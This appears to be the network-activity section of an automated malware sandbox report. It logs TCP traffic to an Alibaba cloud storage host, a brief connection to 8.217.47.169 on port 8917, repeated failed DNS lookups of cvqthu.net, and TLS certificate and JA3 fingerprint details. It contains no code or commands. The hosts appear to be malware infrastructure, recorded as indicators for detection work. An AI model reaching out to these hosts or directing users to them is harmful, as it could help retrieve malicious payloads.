Jan 11, 2025 04:45:10.268678904 CET	49985	443	192.168.2.9	118.178.60.9
Jan 11, 2025 04:45:10.268687963 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.268728018 CET	49985	443	192.168.2.9	118.178.60.9
Jan 11, 2025 04:45:10.268732071 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.268752098 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.268820047 CET	49985	443	192.168.2.9	118.178.60.9
Jan 11, 2025 04:45:10.268829107 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.268909931 CET	49985	443	192.168.2.9	118.178.60.9
Jan 11, 2025 04:45:10.268913984 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.268974066 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.268981934 CET	49985	443	192.168.2.9	118.178.60.9
Jan 11, 2025 04:45:10.268985987 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.269037962 CET	49985	443	192.168.2.9	118.178.60.9
Jan 11, 2025 04:45:10.269042969 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.269081116 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.269097090 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.269123077 CET	49985	443	192.168.2.9	118.178.60.9
Jan 11, 2025 04:45:10.269128084 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.269179106 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.269205093 CET	49985	443	192.168.2.9	118.178.60.9
Jan 11, 2025 04:45:10.269283056 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.269284964 CET	49985	443	192.168.2.9	118.178.60.9
Jan 11, 2025 04:45:10.269337893 CET	49985	443	192.168.2.9	118.178.60.9
Jan 11, 2025 04:45:10.269342899 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.269382954 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.269401073 CET	49985	443	192.168.2.9	118.178.60.9
Jan 11, 2025 04:45:10.269406080 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.269418001 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.269469023 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.269489050 CET	49985	443	192.168.2.9	118.178.60.9
Jan 11, 2025 04:45:10.269506931 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.269575119 CET	49985	443	192.168.2.9	118.178.60.9
Jan 11, 2025 04:45:10.269579887 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.269634008 CET	49985	443	192.168.2.9	118.178.60.9
Jan 11, 2025 04:45:10.269639015 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.269705057 CET	49985	443	192.168.2.9	118.178.60.9
Jan 11, 2025 04:45:10.269707918 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.269717932 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.269778013 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.269804955 CET	49985	443	192.168.2.9	118.178.60.9
Jan 11, 2025 04:45:10.269814014 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.269865036 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.269887924 CET	49985	443	192.168.2.9	118.178.60.9
Jan 11, 2025 04:45:10.269895077 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.269931078 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.269937038 CET	49985	443	192.168.2.9	118.178.60.9
Jan 11, 2025 04:45:10.269989014 CET	49985	443	192.168.2.9	118.178.60.9
Jan 11, 2025 04:45:10.269994020 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.270056963 CET	49985	443	192.168.2.9	118.178.60.9
Jan 11, 2025 04:45:10.270081043 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.270133972 CET	49985	443	192.168.2.9	118.178.60.9
Jan 11, 2025 04:45:10.270138025 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.270206928 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.270229101 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.270230055 CET	49985	443	192.168.2.9	118.178.60.9
Jan 11, 2025 04:45:10.270239115 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.270297050 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.270313025 CET	49985	443	192.168.2.9	118.178.60.9
Jan 11, 2025 04:45:10.270322084 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.270396948 CET	49985	443	192.168.2.9	118.178.60.9
Jan 11, 2025 04:45:10.270411015 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.270478964 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.270487070 CET	49985	443	192.168.2.9	118.178.60.9
Jan 11, 2025 04:45:10.270490885 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.270566940 CET	49985	443	192.168.2.9	118.178.60.9
Jan 11, 2025 04:45:10.270571947 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.270586014 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.270627975 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.270642996 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.270662069 CET	49985	443	192.168.2.9	118.178.60.9
Jan 11, 2025 04:45:10.270668030 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.270735979 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.270762920 CET	49985	443	192.168.2.9	118.178.60.9
Jan 11, 2025 04:45:10.270762920 CET	49985	443	192.168.2.9	118.178.60.9
Jan 11, 2025 04:45:10.270771027 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.270826101 CET	49985	443	192.168.2.9	118.178.60.9
Jan 11, 2025 04:45:10.270832062 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.270899057 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.270908117 CET	49985	443	192.168.2.9	118.178.60.9
Jan 11, 2025 04:45:10.270910978 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.270941019 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.270963907 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.270998001 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.271007061 CET	49985	443	192.168.2.9	118.178.60.9
Jan 11, 2025 04:45:10.271012068 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.271055937 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.271075964 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.271090031 CET	49985	443	192.168.2.9	118.178.60.9
Jan 11, 2025 04:45:10.271096945 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.271155119 CET	49985	443	192.168.2.9	118.178.60.9
Jan 11, 2025 04:45:10.271161079 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.271225929 CET	49985	443	192.168.2.9	118.178.60.9
Jan 11, 2025 04:45:10.271229982 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.271241903 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.271256924 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.271339893 CET	49985	443	192.168.2.9	118.178.60.9
Jan 11, 2025 04:45:10.271342039 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.271356106 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.271408081 CET	49985	443	192.168.2.9	118.178.60.9
Jan 11, 2025 04:45:10.271414042 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.271486998 CET	49985	443	192.168.2.9	118.178.60.9
Jan 11, 2025 04:45:10.271490097 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.271533966 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.271555901 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.271568060 CET	49985	443	192.168.2.9	118.178.60.9
Jan 11, 2025 04:45:10.271573067 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.271589041 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.271610022 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.271641016 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.271655083 CET	49985	443	192.168.2.9	118.178.60.9
Jan 11, 2025 04:45:10.271747112 CET	49985	443	192.168.2.9	118.178.60.9
Jan 11, 2025 04:45:10.271753073 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.271807909 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.271821022 CET	49985	443	192.168.2.9	118.178.60.9
Jan 11, 2025 04:45:10.271838903 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.271873951 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.271898985 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.271908998 CET	49985	443	192.168.2.9	118.178.60.9
Jan 11, 2025 04:45:10.271927118 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.272006989 CET	49985	443	192.168.2.9	118.178.60.9
Jan 11, 2025 04:45:10.359461069 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.359554052 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.359612942 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.359633923 CET	49985	443	192.168.2.9	118.178.60.9
Jan 11, 2025 04:45:10.359667063 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.359683990 CET	49985	443	192.168.2.9	118.178.60.9
Jan 11, 2025 04:45:10.359693050 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.359718084 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.359769106 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.359792948 CET	49985	443	192.168.2.9	118.178.60.9
Jan 11, 2025 04:45:10.359800100 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.359821081 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.359857082 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.359869957 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.359900951 CET	49985	443	192.168.2.9	118.178.60.9
Jan 11, 2025 04:45:10.359906912 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.359919071 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.359956980 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.360008001 CET	49985	443	192.168.2.9	118.178.60.9
Jan 11, 2025 04:45:10.360009909 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.360040903 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.360059977 CET	49985	443	192.168.2.9	118.178.60.9
Jan 11, 2025 04:45:10.360085964 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.360117912 CET	49985	443	192.168.2.9	118.178.60.9
Jan 11, 2025 04:45:10.360125065 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.360150099 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.360166073 CET	49985	443	192.168.2.9	118.178.60.9
Jan 11, 2025 04:45:10.360205889 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.360224962 CET	49985	443	192.168.2.9	118.178.60.9
Jan 11, 2025 04:45:10.360230923 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.360282898 CET	49985	443	192.168.2.9	118.178.60.9
Jan 11, 2025 04:45:10.360287905 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.360358953 CET	49985	443	192.168.2.9	118.178.60.9
Jan 11, 2025 04:45:10.360456944 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.360541105 CET	49985	443	192.168.2.9	118.178.60.9
Jan 11, 2025 04:45:10.360543966 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.360569954 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.360615015 CET	49985	443	192.168.2.9	118.178.60.9
Jan 11, 2025 04:45:10.360620022 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.360670090 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.360706091 CET	49985	443	192.168.2.9	118.178.60.9
Jan 11, 2025 04:45:10.360729933 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.360779047 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.360780001 CET	49985	443	192.168.2.9	118.178.60.9
Jan 11, 2025 04:45:10.360801935 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.360847950 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.360872030 CET	49985	443	192.168.2.9	118.178.60.9
Jan 11, 2025 04:45:10.360877991 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.360905886 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.360955000 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.360960960 CET	49985	443	192.168.2.9	118.178.60.9
Jan 11, 2025 04:45:10.360976934 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.361010075 CET	49985	443	192.168.2.9	118.178.60.9
Jan 11, 2025 04:45:10.361022949 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.361063957 CET	49985	443	192.168.2.9	118.178.60.9
Jan 11, 2025 04:45:10.361068964 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.361152887 CET	49985	443	192.168.2.9	118.178.60.9
Jan 11, 2025 04:45:10.361267090 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.361325979 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.361330986 CET	49985	443	192.168.2.9	118.178.60.9
Jan 11, 2025 04:45:10.361346006 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.361413956 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.361418009 CET	49985	443	192.168.2.9	118.178.60.9
Jan 11, 2025 04:45:10.361438990 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.361515999 CET	49985	443	192.168.2.9	118.178.60.9
Jan 11, 2025 04:45:10.361521959 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.361565113 CET	49985	443	192.168.2.9	118.178.60.9
Jan 11, 2025 04:45:10.361802101 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.361867905 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.361887932 CET	49985	443	192.168.2.9	118.178.60.9
Jan 11, 2025 04:45:10.361892939 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.361922979 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.361979961 CET	49985	443	192.168.2.9	118.178.60.9
Jan 11, 2025 04:45:10.361987114 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.362034082 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.362037897 CET	49985	443	192.168.2.9	118.178.60.9
Jan 11, 2025 04:45:10.362047911 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.362113953 CET	49985	443	192.168.2.9	118.178.60.9
Jan 11, 2025 04:45:10.362137079 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.362188101 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.362209082 CET	49985	443	192.168.2.9	118.178.60.9
Jan 11, 2025 04:45:10.362210035 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.362219095 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.362237930 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.362265110 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.362267971 CET	49985	443	192.168.2.9	118.178.60.9
Jan 11, 2025 04:45:10.362272978 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.362330914 CET	49985	443	192.168.2.9	118.178.60.9
Jan 11, 2025 04:45:10.362380981 CET	49985	443	192.168.2.9	118.178.60.9
Jan 11, 2025 04:45:10.362385035 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.362464905 CET	49985	443	192.168.2.9	118.178.60.9
Jan 11, 2025 04:45:10.362524986 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.362565994 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.362601995 CET	49985	443	192.168.2.9	118.178.60.9
Jan 11, 2025 04:45:10.362607002 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.362689972 CET	49985	443	192.168.2.9	118.178.60.9
Jan 11, 2025 04:45:10.362940073 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:45:10.363017082 CET	49985	443	192.168.2.9	118.178.60.9
Jan 11, 2025 04:45:14.851054907 CET	49987	8917	192.168.2.9	8.217.47.169
Jan 11, 2025 04:45:14.856312037 CET	8917	49987	8.217.47.169	192.168.2.9
Jan 11, 2025 04:45:14.856381893 CET	49987	8917	192.168.2.9	8.217.47.169
Jan 11, 2025 04:45:15.425167084 CET	49987	8917	192.168.2.9	8.217.47.169
Jan 11, 2025 04:45:15.430752039 CET	8917	49987	8.217.47.169	192.168.2.9
Jan 11, 2025 04:45:38.582680941 CET	62981	53	192.168.2.9	1.1.1.1
Jan 11, 2025 04:45:38.587698936 CET	53	62981	1.1.1.1	192.168.2.9
Jan 11, 2025 04:45:38.587816000 CET	62981	53	192.168.2.9	1.1.1.1
Jan 11, 2025 04:45:38.588871956 CET	62981	53	192.168.2.9	1.1.1.1
Jan 11, 2025 04:45:38.593826056 CET	53	62981	1.1.1.1	192.168.2.9
Jan 11, 2025 04:45:39.067940950 CET	53	62981	1.1.1.1	192.168.2.9
Jan 11, 2025 04:45:39.070718050 CET	62981	53	192.168.2.9	1.1.1.1
Jan 11, 2025 04:45:39.075870991 CET	53	62981	1.1.1.1	192.168.2.9
Jan 11, 2025 04:45:39.075959921 CET	62981	53	192.168.2.9	1.1.1.1
Jan 11, 2025 04:46:10.176007032 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:46:10.176079035 CET	443	49985	118.178.60.9	192.168.2.9
Jan 11, 2025 04:46:10.176132917 CET	49985	443	192.168.2.9	118.178.60.9

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 04:43:41.207650900 CET	50726	53	192.168.2.9	1.1.1.1
Jan 11, 2025 04:43:41.519522905 CET	53	50726	1.1.1.1	192.168.2.9
Jan 11, 2025 04:44:16.092442989 CET	60759	53	192.168.2.9	1.1.1.1
Jan 11, 2025 04:44:16.567384005 CET	53	60759	1.1.1.1	192.168.2.9
Jan 11, 2025 04:45:14.325987101 CET	63142	53	192.168.2.9	1.1.1.1
Jan 11, 2025 04:45:14.335127115 CET	53	63142	1.1.1.1	192.168.2.9
Jan 11, 2025 04:45:20.369538069 CET	63400	53	192.168.2.9	1.1.1.1
Jan 11, 2025 04:45:20.379081011 CET	53	63400	1.1.1.1	192.168.2.9
Jan 11, 2025 04:45:26.510795116 CET	57056	53	192.168.2.9	1.1.1.1
Jan 11, 2025 04:45:26.520354986 CET	53	57056	1.1.1.1	192.168.2.9
Jan 11, 2025 04:45:32.542709112 CET	53714	53	192.168.2.9	1.1.1.1
Jan 11, 2025 04:45:32.552742958 CET	53	53714	1.1.1.1	192.168.2.9
Jan 11, 2025 04:45:38.575167894 CET	55546	53	192.168.2.9	1.1.1.1
Jan 11, 2025 04:45:38.582200050 CET	53	55546	1.1.1.1	192.168.2.9
Jan 11, 2025 04:45:45.088474989 CET	51202	53	192.168.2.9	1.1.1.1
Jan 11, 2025 04:45:45.098419905 CET	53	51202	1.1.1.1	192.168.2.9
Jan 11, 2025 04:45:51.119652987 CET	57534	53	192.168.2.9	1.1.1.1
Jan 11, 2025 04:45:51.128896952 CET	53	57534	1.1.1.1	192.168.2.9
Jan 11, 2025 04:45:57.151330948 CET	52828	53	192.168.2.9	1.1.1.1
Jan 11, 2025 04:45:57.160698891 CET	53	52828	1.1.1.1	192.168.2.9
Jan 11, 2025 04:46:03.317244053 CET	62532	53	192.168.2.9	1.1.1.1
Jan 11, 2025 04:46:03.351439953 CET	53	62532	1.1.1.1	192.168.2.9

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 11, 2025 04:43:41.207650900 CET	192.168.2.9	1.1.1.1	0x8437	Standard query (0)	662hfg.oss-cn-beijing.aliyuncs.com	A (IP address)	IN (0x0001)	false
Jan 11, 2025 04:44:16.092442989 CET	192.168.2.9	1.1.1.1	0xb39	Standard query (0)	22mm.oss-cn-hangzhou.aliyuncs.com	A (IP address)	IN (0x0001)	false
Jan 11, 2025 04:45:14.325987101 CET	192.168.2.9	1.1.1.1	0x45f7	Standard query (0)	cvqthu.net	A (IP address)	IN (0x0001)	false
Jan 11, 2025 04:45:20.369538069 CET	192.168.2.9	1.1.1.1	0xe357	Standard query (0)	cvqthu.net	A (IP address)	IN (0x0001)	false
Jan 11, 2025 04:45:26.510795116 CET	192.168.2.9	1.1.1.1	0x820a	Standard query (0)	cvqthu.net	A (IP address)	IN (0x0001)	false
Jan 11, 2025 04:45:32.542709112 CET	192.168.2.9	1.1.1.1	0x4758	Standard query (0)	cvqthu.net	A (IP address)	IN (0x0001)	false
Jan 11, 2025 04:45:38.575167894 CET	192.168.2.9	1.1.1.1	0x46b7	Standard query (0)	cvqthu.net	A (IP address)	IN (0x0001)	false
Jan 11, 2025 04:45:38.588871956 CET	192.168.2.9	1.1.1.1	0x1	Standard query (0)	cvqthu.net	A (IP address)	IN (0x0001)	false
Jan 11, 2025 04:45:45.088474989 CET	192.168.2.9	1.1.1.1	0xaaf5	Standard query (0)	cvqthu.net	A (IP address)	IN (0x0001)	false
Jan 11, 2025 04:45:51.119652987 CET	192.168.2.9	1.1.1.1	0x67a8	Standard query (0)	cvqthu.net	A (IP address)	IN (0x0001)	false
Jan 11, 2025 04:45:57.151330948 CET	192.168.2.9	1.1.1.1	0xdbe0	Standard query (0)	cvqthu.net	A (IP address)	IN (0x0001)	false
Jan 11, 2025 04:46:03.317244053 CET	192.168.2.9	1.1.1.1	0xdaf6	Standard query (0)	cvqthu.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 11, 2025 04:42:54.171977043 CET	1.1.1.1	192.168.2.9	0x840a	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	s-part-0017.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 04:42:54.171977043 CET	1.1.1.1	192.168.2.9	0x840a	No error (0)	s-part-0017.t-0009.t-msedge.net		13.107.246.45	A (IP address)	IN (0x0001)	false
Jan 11, 2025 04:43:41.519522905 CET	1.1.1.1	192.168.2.9	0x8437	No error (0)	662hfg.oss-cn-beijing.aliyuncs.com	sc-2ixf.cn-beijing.oss-adns.aliyuncs.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 04:43:41.519522905 CET	1.1.1.1	192.168.2.9	0x8437	No error (0)	sc-2ixf.cn-beijing.oss-adns.aliyuncs.com	sc-2ixf.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 04:43:41.519522905 CET	1.1.1.1	192.168.2.9	0x8437	No error (0)	sc-2ixf.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com		39.103.20.105	A (IP address)	IN (0x0001)	false
Jan 11, 2025 04:44:16.567384005 CET	1.1.1.1	192.168.2.9	0xb39	No error (0)	22mm.oss-cn-hangzhou.aliyuncs.com	sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 04:44:16.567384005 CET	1.1.1.1	192.168.2.9	0xb39	No error (0)	sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com	sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 04:44:16.567384005 CET	1.1.1.1	192.168.2.9	0xb39	No error (0)	sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com		118.178.60.9	A (IP address)	IN (0x0001)	false
Jan 11, 2025 04:45:14.335127115 CET	1.1.1.1	192.168.2.9	0x45f7	Name error (3)	cvqthu.net	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 04:45:20.379081011 CET	1.1.1.1	192.168.2.9	0xe357	Name error (3)	cvqthu.net	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 04:45:26.520354986 CET	1.1.1.1	192.168.2.9	0x820a	Name error (3)	cvqthu.net	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 04:45:32.552742958 CET	1.1.1.1	192.168.2.9	0x4758	Name error (3)	cvqthu.net	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 04:45:39.067940950 CET	1.1.1.1	192.168.2.9	0x1	Name error (3)	cvqthu.net	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 04:45:45.098419905 CET	1.1.1.1	192.168.2.9	0xaaf5	Name error (3)	cvqthu.net	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 04:45:51.128896952 CET	1.1.1.1	192.168.2.9	0x67a8	Name error (3)	cvqthu.net	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 04:45:57.160698891 CET	1.1.1.1	192.168.2.9	0xdbe0	Name error (3)	cvqthu.net	none	none	A (IP address)	IN (0x0001)	false
Jan 11, 2025 04:46:03.351439953 CET	1.1.1.1	192.168.2.9	0xdaf6	Name error (3)	cvqthu.net	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

662hfg.oss-cn-beijing.aliyuncs.com

22mm.oss-cn-hangzhou.aliyuncs.com

HTTPS Connections

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Jan 11, 2025 04:44:59.291975021 CET	118.178.60.9	443	192.168.2.9	49985	CN=cn-hangzhou.oss.aliyuncs.com, O="Alibaba (China) Technology Co., Ltd.", L=HangZhou, ST=ZheJiang, C=CN CN=GlobalSign Organization Validation CA - SHA256 - G3, O=GlobalSign nv-sa, C=BE	CN=GlobalSign Organization Validation CA - SHA256 - G3, O=GlobalSign nv-sa, C=BE CN=GlobalSign Root CA, OU=Root CA, O=GlobalSign nv-sa, C=BE	Mon Feb 19 06:01:07 CET 2024 Fri Sep 04 02:00:00 CEST 2015	Sat Mar 22 06:01:06 CET 2025 Thu Sep 04 02:00:00 CEST 2025	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	37f463bf4616ecd445d4a1937da06e19
Jan 11, 2025 04:44:59.291975021 CET	118.178.60.9	443	192.168.2.9	49985	CN=GlobalSign Organization Validation CA - SHA256 - G3, O=GlobalSign nv-sa, C=BE	CN=GlobalSign Root CA, OU=Root CA, O=GlobalSign nv-sa, C=BE	Fri Sep 04 02:00:00 CEST 2015	Thu Sep 04 02:00:00 CEST 2025		37f463bf4616ecd445d4a1937da06e19

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
